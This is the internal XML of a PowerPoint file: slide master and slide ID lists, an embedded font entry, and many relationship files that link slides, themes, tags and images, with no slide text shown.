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0" r:id="rId3"/>
    <p:sldMasterId id="2147483652" r:id="rId4"/>
    <p:sldMasterId id="2147483654" r:id="rId5"/>
    <p:sldMasterId id="2147483657" r:id="rId6"/>
    <p:sldMasterId id="2147483659" r:id="rId7"/>
    <p:sldMasterId id="2147483661" r:id="rId8"/>
    <p:sldMasterId id="2147483663" r:id="rId9"/>
    <p:sldMasterId id="2147483665" r:id="rId10"/>
    <p:sldMasterId id="2147483667" r:id="rId11"/>
    <p:sldMasterId id="2147483669" r:id="rId12"/>
    <p:sldMasterId id="2147483671" r:id="rId13"/>
    <p:sldMasterId id="2147483673" r:id="rId14"/>
    <p:sldMasterId id="2147483675" r:id="rId15"/>
    <p:sldMasterId id="2147483677" r:id="rId16"/>
    <p:sldMasterId id="2147483679" r:id="rId17"/>
    <p:sldMasterId id="2147483681" r:id="rId18"/>
    <p:sldMasterId id="2147483683" r:id="rId19"/>
    <p:sldMasterId id="2147483685" r:id="rId20"/>
    <p:sldMasterId id="2147483687" r:id="rId21"/>
    <p:sldMasterId id="2147483689" r:id="rId22"/>
    <p:sldMasterId id="2147483691" r:id="rId23"/>
    <p:sldMasterId id="2147483693" r:id="rId24"/>
    <p:sldMasterId id="2147483695" r:id="rId25"/>
    <p:sldMasterId id="2147483697" r:id="rId26"/>
    <p:sldMasterId id="2147483699" r:id="rId27"/>
    <p:sldMasterId id="2147483701" r:id="rId28"/>
    <p:sldMasterId id="2147483703" r:id="rId29"/>
    <p:sldMasterId id="2147483705" r:id="rId30"/>
    <p:sldMasterId id="2147483707" r:id="rId31"/>
    <p:sldMasterId id="2147483709" r:id="rId32"/>
    <p:sldMasterId id="2147483711" r:id="rId33"/>
    <p:sldMasterId id="2147483713" r:id="rId34"/>
    <p:sldMasterId id="2147483715" r:id="rId35"/>
    <p:sldMasterId id="2147483717" r:id="rId36"/>
    <p:sldMasterId id="2147483719" r:id="rId37"/>
    <p:sldMasterId id="2147483721" r:id="rId38"/>
    <p:sldMasterId id="2147483723" r:id="rId39"/>
    <p:sldMasterId id="2147483725" r:id="rId40"/>
    <p:sldMasterId id="2147483727" r:id="rId41"/>
    <p:sldMasterId id="2147483729" r:id="rId42"/>
    <p:sldMasterId id="2147483731" r:id="rId43"/>
    <p:sldMasterId id="2147483733" r:id="rId44"/>
    <p:sldMasterId id="2147483735" r:id="rId45"/>
    <p:sldMasterId id="2147483737" r:id="rId46"/>
    <p:sldMasterId id="2147483739" r:id="rId47"/>
    <p:sldMasterId id="2147483741" r:id="rId48"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId51"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId49"/>
    <p:sldId id="263" r:id="rId50"/>
    <p:sldId id="665" r:id="rId52"/>
    <p:sldId id="643" r:id="rId53"/>
    <p:sldId id="644" r:id="rId54"/>
    <p:sldId id="767" r:id="rId55"/>
    <p:sldId id="768" r:id="rId56"/>
    <p:sldId id="769" r:id="rId57"/>
    <p:sldId id="729" r:id="rId58"/>
    <p:sldId id="771" r:id="rId59"/>
    <p:sldId id="666" r:id="rId60"/>
    <p:sldId id="691" r:id="rId61"/>
    <p:sldId id="690" r:id="rId62"/>
    <p:sldId id="772" r:id="rId63"/>
    <p:sldId id="751" r:id="rId64"/>
    <p:sldId id="689" r:id="rId65"/>
    <p:sldId id="693" r:id="rId66"/>
    <p:sldId id="703" r:id="rId67"/>
    <p:sldId id="696" r:id="rId68"/>
    <p:sldId id="697" r:id="rId69"/>
    <p:sldId id="698" r:id="rId70"/>
    <p:sldId id="699" r:id="rId71"/>
    <p:sldId id="700" r:id="rId72"/>
    <p:sldId id="637" r:id="rId73"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
      <p:regular r:id="rId77"/>
    </p:embeddedFont>
  </p:embeddedFontLst>
  <p:custDataLst>
    <p:tags r:id="rId7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28BE"/>
    <a:srgbClr val="07A7AF"/>
    <a:srgbClr val="0000FF"/>
    <a:srgbClr val="FADBD8"/>
    <a:srgbClr val="37BECC"/>
    <a:srgbClr val="D7F2F5"/>
    <a:srgbClr val="E74C3C"/>
    <a:srgbClr val="CA3E9D"/>
    <a:srgbClr val="D120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1" d="100"/>
          <a:sy n="71" d="100"/>
        </p:scale>
        <p:origin x="412" y="44"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="4123"/>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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag343.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font1.fntdata"/><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24.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide23.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide22.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide21.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster6.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide13.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide12.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster5.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster4.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster47.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster46.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster45.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster44.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster43.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21922-B392-49CB-98B2-D1506FCEECF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82BF-40C1-4E6C-9085-1B48E30F0BD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23020B4-C4F0-47FB-9EF6-DA1D8CA35CE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tags" Target="../tags/tag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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme10.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout11.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster11.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme11.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout12.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster12.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme12.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme13.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster14.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme14.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout15.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster15.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme15.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout16.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster16.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme16.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout17.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster17.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heme" Target="../theme/theme17.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout18.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster18.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theme" Target="../theme/theme18.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout19.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster19.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme19.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout20.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tags" Target="../tags/tag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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme20.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout21.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster21.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme21.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout22.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster22.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme22.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout23.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster23.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme23.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout24.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster24.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme24.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout25.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster25.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme25.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout26.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster26.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme26.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout27.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster27.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme27.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15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Layout" Target="../slideLayouts/slideLayout28.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster28.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme28.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15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slideLayout" Target="../slideLayouts/slideLayout29.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster29.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme29.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16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0"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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme30.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16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slideLayout" Target="../slideLayouts/slideLayout31.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster31.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme31.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17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slideLayout" Target="../slideLayouts/slideLayout32.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster32.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme32.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17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slideLayout" Target="../slideLayouts/slideLayout33.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster33.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme33.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17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slideLayout" Target="../slideLayouts/slideLayout34.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster34.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme34.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18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slideLayout" Target="../slideLayouts/slideLayout35.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster35.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme35.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18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slideLayout" Target="../slideLayouts/slideLayout36.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster36.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme36.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19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Layout" Target="../slideLayouts/slideLayout37.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster37.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme37.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19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Layout" Target="../slideLayouts/slideLayout38.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster38.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme38.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19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slideLayout" Target="../slideLayouts/slideLayout39.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster39.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme39.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag20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image" Target="../media/image3.svg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.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slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme4.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag20.xml"/><Relationship Id="rId1"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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme40.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag20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slideLayout" Target="../slideLayouts/slideLayout41.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster41.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme41.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21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slideLayout" Target="../slideLayouts/slideLayout42.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster42.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme42.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21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slideLayout" Target="../slideLayouts/slideLayout43.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster43.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme43.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag218.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slideLayout" Target="../slideLayouts/slideLayout44.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster44.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme44.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag222.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slideLayout" Target="../slideLayouts/slideLayout45.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster45.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme45.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag226.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slideLayout" Target="../slideLayouts/slideLayout46.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster46.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme46.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag230.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slideLayout" Target="../slideLayouts/slideLayout47.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster47.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme47.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag23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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2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0"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0"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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme8.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout9.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster9.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme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0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9"/>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10"/>
    </p:custDataLst>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0"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4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image" Target="../media/image5.png"/><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image" Target="../media/image4.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag235.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7.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag279.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag278.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag287.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag286.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag285.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag284.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag283.xml"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag289.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag288.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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag298.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag297.xml"/><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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag299.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag290.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00.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48.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag304.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><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tags" Target="../tags/tag30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7.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag30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0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07.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tags" Target="../tags/tag308.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag316.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag315.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag314.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag313.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag312.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag311.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag310.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.jpeg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" 